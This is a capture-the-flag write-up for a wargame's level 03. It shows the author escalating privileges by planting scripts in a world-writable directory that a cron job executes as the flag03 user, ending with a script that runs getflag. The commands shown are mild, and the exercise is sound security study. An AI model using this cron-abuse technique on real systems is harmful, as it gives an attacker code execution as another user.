Level 03 instructions
About Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Alright it wants me to start by checking the flag03 home directory.
ls -al /home/flag03
total 6 drwxr-x--- 3 flag03 level03 103 2011-11-20 20:39 . drwxr-xr-x 1 root root 80 2012-08-27 07:18 .. -rw-r--r-- 1 flag03 flag03 220 2011-05-18 02:54 .bash_logout -rw-r--r-- 1 flag03 flag03 3353 2011-05-18 02:54 .bashrc -rw-r--r-- 1 flag03 flag03 675 2011-05-18 02:54 .profile drwxrwxrwx 2 flag03 flag03 3 2012-08-18 05:24 writable.d -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
The file writable.sh looks interesting and has execute permissions.
#!/bin/sh for i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done
So this loop runs for every file in /home/flag03/writable.d. It uses ulimit to set a max cput time of 5 seconds then runs bash -x $i, where i is the name of the file. Finally it deletes the file with rm -f $i. So any file that I put into the writable.d directory should get executed each time the script is run.
I test this by creating a simple script in the writable.d directory. If it runs succesfully it should create a new empty file in the /tmp/ directory. Then I run the writable.sh script and see what happens.
echo "touch /tmp/works.tmp" > /home/flag03/writable.d/test.sh /home/flag03/writable.sh
+ touch /tmp/works.tmp
Now I check my /tmp/ folder to see if the script worked as expected.
Great so the script is working as expected. The instructions for this level state that there is a crontab job that runs every few minutes so I create a create a new script to execute getflag and see if cron runs it as the flag03 account.
echo 'getflag > /tmp/gotflag.txt' >/home/flag03/writable.d/gettheflag.sh cat /tmp/gotflag.txt
You have successfully executed getflag on a target account